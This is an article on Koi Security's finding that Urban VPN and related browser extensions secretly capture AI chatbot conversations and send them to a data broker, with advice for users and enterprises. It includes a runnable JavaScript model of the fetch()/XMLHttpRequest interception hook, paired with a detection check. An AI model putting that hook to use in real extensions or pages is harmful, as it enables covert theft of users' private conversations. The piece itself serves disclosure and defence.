Browser Extensions with 8 Million Users Harvest Full AI Conversations: A Major Privacy Scandal Unveiled
On December 16-17, 2025, Koi Security published findings that browser extensions with over 8 million combined installs across Chrome and Edge have been silently harvesting complete conversations from leading AI chatbots. These "privacy-focused" tools, published mainly by Urban Cyber Security Inc., intercept prompts and responses on ChatGPT, Claude, Gemini, Microsoft Copilot, Perplexity, DeepSeek, Grok and Meta AI, then transmit the data to servers linked to the data broker BiScience for marketing analytics.
The flagship culprit, Urban VPN Proxy, has more than 6 million Chrome users and carries Google's "Featured" badge, which signals to users that the listing has been reviewed for quality and adherence to store policies. Yet since a silent update in July 2025 (version 5.5.0), it and seven sibling extensions have been capturing AI conversations regardless of whether their advertised functions (VPN, ad blocking and so on) are switched on. The betrayal affects millions who installed these tools seeking protection, only to have their most sensitive digital dialogues, often containing health, financial or personal details, turned into a commodity.
This scandal highlights the vulnerabilities in browser extension ecosystems, where privileged access meets lax oversight. As AI chats become repositories for users’ deepest thoughts, this incident underscores a critical erosion of privacy in the age of generative AI.

The Discovery: How Koi Security Uncovered the Breach
Koi Security's investigation started with a routine scan: their Wings agentic-AI risk engine was used to look for extensions capable of exfiltrating AI chat data. Near the top of the list was Urban VPN Proxy, a highly rated Featured extension promising secure browsing and "AI protection."
Deeper analysis revealed malware-like behavior. When a user visits a targeted AI site, the extension injects a platform-specific "executor" script (e.g., chatgpt.js, claude.js, gemini.js) into the page. These scripts replace the page's fetch() function and XMLHttpRequest methods with wrappers, so every request to and response from the chatbot's API passes through extension code before the page ever renders it.
Captured data includes:
- Full user prompts and AI responses
- Conversation IDs and timestamps
- Session metadata
- Platform and model details
This packaged information routes to Urban VPN servers (e.g., analytics.urban-vpn.com), then allegedly to BiScience for aggregation and sale.
Koi expanded the probe, finding identical code in seven more extensions: 1ClickVPN Proxy, Urban Browser Guard, Urban Ad Blocker, and variants on Edge. Total reach: over 8 million installs.

Technical Breakdown: A Masterclass in Stealthy Data Exfiltration
The mechanism is simple. The extensions request the broad host permission that Chrome presents as "read and change all your data on websites you visit", which lets them inject content scripts into any page.
Process:
- The background worker watches tab navigations for AI chatbot domains.
- On a match, it injects the platform-specific executor script into the page.
- The executor wraps fetch() and XMLHttpRequest so raw request and response bodies are copied as they pass through, without disturbing what the page receives.
- The captured data (prompts, responses, conversation IDs, timestamps, session metadata, platform and model details) is parsed, packaged and relayed out of the page with postMessage.
- The background worker transmits the package to Urban VPN's servers, independently of whether the VPN or ad-block feature is turned on.
Hardcoded flags enable the harvesting by default; there is no setting to turn it off short of uninstalling the extension.
The separate "AI protection" feature, which warns users about sharing sensitive data, creates an ironic deception: it alerts the user not to paste an email address into ChatGPT while the same extension sends the entire conversation to third parties.
Because the behavior arrived through an automatic update in July 2025 and the extension already held the host permission it needed, Chrome showed existing users no new permission prompt, and nobody consented to the collection.
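To make the mechanism concrete, here is an added example (not code from Koi Security or from the extensions discussed) that models the fetch()/XMLHttpRequest hook described above and pairs it with the integrity check a page or a browser-security tool can use to detect that kind of hook. `createRealm()` is a constructed stand-in for a browser window so the code runs under Node without a browser; the target domains, the sink function and the payload shape are assumptions for illustration, not the real extension's values.

```javascript
// Added example (not code from Koi Security or the extensions discussed):
// a model of the fetch()/XMLHttpRequest hook described above, followed by
// the integrity check a page or browser-security tool can use to detect it.
// `createRealm()` is a constructed stand-in for a browser window; the target
// domains, the sink and the payload shape are assumptions for illustration.

function createRealm() {
  // Stand-in fetch: answers any POST with a canned JSON "assistant" reply.
  async function fetch(url, init = {}) {
    const req = JSON.parse(init.body || "{}");
    const body = JSON.stringify({ id: "conv-1", reply: `echo: ${req.prompt}` });
    return {
      url: String(url),
      clone() { return this; },              // a real Response.clone() returns a copy
      async text() { return body; },
      async json() { return JSON.parse(body); },
    };
  }
  class XMLHttpRequest {
    open(method, url) { this.method = method; this.url = String(url); }
    send(body) { this.body = body; }
  }
  return { fetch, XMLHttpRequest };
}

// The hook. A page-world script replaces realm.fetch and
// XMLHttpRequest.prototype.send with wrappers that copy request and response
// bodies to `sink`, which stands in for the postMessage -> content script ->
// background worker -> server path. The page still receives an unread body
// because the wrapper reads from a clone.
function installCaptureHook(realm, sink, targets = ["chatgpt.com", "claude.ai"]) {
  const origFetch = realm.fetch;
  const origSend = realm.XMLHttpRequest.prototype.send;
  const isTarget = (url) => targets.some((t) => String(url).includes(t));

  realm.fetch = async function (url, init) {
    const res = await origFetch.call(this, url, init);
    if (isTarget(url)) {
      const response = await res.clone().text();
      sink({ url: String(url), request: init && init.body, response, ts: Date.now() });
    }
    return res;
  };
  realm.XMLHttpRequest.prototype.send = function (body) {
    // Request side only in this model; a real hook also reads the response
    // from the XHR load event.
    if (isTarget(this.url)) sink({ url: this.url, request: body, response: null, ts: Date.now() });
    return origSend.call(this, body);
  };
}

// The check. Snapshot the API references before any untrusted script can
// run, then compare later: a hook replaces the function objects, so the
// identities no longer match the snapshot.
function snapshotApis(realm) {
  return {
    fetch: realm.fetch,
    "XMLHttpRequest.prototype.open": realm.XMLHttpRequest.prototype.open,
    "XMLHttpRequest.prototype.send": realm.XMLHttpRequest.prototype.send,
  };
}
function auditApis(realm, snapshot) {
  const now = snapshotApis(realm);
  return Object.keys(snapshot).filter((k) => now[k] !== snapshot[k]);
}

// Walk-through: hook a realm, send one chat request, one unrelated request
// and one XHR to a second platform, then report what the sink captured and
// what the audit flags.
async function demo() {
  const realm = createRealm();
  const snapshot = snapshotApis(realm);         // taken before the hook
  const captured = [];
  installCaptureHook(realm, (rec) => captured.push(rec));

  await realm.fetch("https://chatgpt.com/backend-api/conversation", {
    method: "POST", body: JSON.stringify({ prompt: "my account number is 12345" }),
  });
  await realm.fetch("https://example.org/api", {
    method: "POST", body: JSON.stringify({ prompt: "unrelated" }),
  });
  const xhr = new realm.XMLHttpRequest();
  xhr.open("POST", "https://claude.ai/api/append_message");
  xhr.send(JSON.stringify({ prompt: "second platform" }));

  return { captured, tampered: auditApis(realm, snapshot) };
}

demo().then(({ captured, tampered }) => {
  console.log(`captured ${captured.length} records; tampered APIs: ${tampered.join(", ")}`);
});
```

Two caveats for anyone turning the check into a real control. The snapshot is only meaningful if it predates the hook, and an extension content script registered for document_start runs before any page script, so on a real page the comparison is most useful from a security product's own early-injected script. Comparing `Function.prototype.toString` output against the `[native code]` form is a common second signal, but a hook author can override toString as well, so treat it as a heuristic rather than proof.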

The Publisher and Data Broker Connection
Urban Cyber Security Inc. develops these extensions and is affiliated with BiScience, a data broker known for selling clickstream data through products such as AdClarity.
Privacy policies updated in June 2025 state that "AI prompts and outputs" are collected for "marketing analytics" and claim the data is anonymized. Yet the Chrome Web Store listings assert that user data is not sold to third parties, and the disclosure is buried in the policy text rather than surfaced at install time.
Earlier reports had flagged BiScience for harvesting browsing history; this escalates the collection to far more sensitive AI dialogues.
Scale and Sensitivity: Why This Matters
Over 8 million installs, harvesting continuously since July, plausibly amounts to hundreds of millions of captured conversations, though that is an extrapolation rather than a published count. AI chats often delve into vulnerable topics: therapy sessions, medical advice, financial planning, relationship issues.
This data enables targeted advertising, profiling, or worse. Conversation IDs and session metadata travel with the text, and prompts routinely contain names, addresses or account details, so claims of anonymization offer little protection against re-identification.
Ironically, users sought privacy tools, amplifying the betrayal.
Platform Oversight Failures
Google's "Featured" badge and store review failed to detect months of activity. The July update reached existing users through the normal automatic update channel, and because the extensions already held the broad host permission, no new consent prompt was shown and the badge stayed in place.
Microsoft Edge's add-on store carries the same extensions and showed the same gap. Calls are mounting for behavioral auditing of what extensions actually do at runtime, not just static review, and for prominent consent before sensitive collection begins.
User Impact and Immediate Risks
Affected users should:
- Uninstall all Urban and 1ClickVPN extensions immediately.
- Assume any AI chat conducted since July 2025 with the extensions installed has been captured.
- Rotate passwords, API keys or other secrets that appeared in those chats.
- Monitor for phishing that leverages leaked personal details.
Enterprises should inventory the extensions installed across managed browsers, enforce an allowlist through browser policy (ExtensionInstallAllowlist in Chrome and Edge) rather than trusting store badges, and treat any extension holding the "read and change all your data on websites you visit" permission as high-risk regardless of publisher reputation.
Broader Implications for AI Privacy
This exposes AI’s privacy paradox: users confide in chatbots assuming seclusion, yet intermediaries lurk.
It fuels debates on extension permissions, store accountability, and data brokerage regulation.
As AI integrates deeper, such breaches erode trust.
Conclusion: Safeguarding Your Digital Confidences
The exposure of browser extensions harvesting AI conversations from 8 million users marks a watershed privacy scandal. What began as tools for protection morphed into surveillance engines, commoditizing intimate dialogues for profit.
Vigilance is paramount: scrutinize extensions, favor minimal permissions, demand transparency from platforms.
In an era where AI companions hold our secrets, this incident reminds us—privacy isn’t guaranteed; it must be fiercely guarded. Review your extensions today; your conversations depend on it.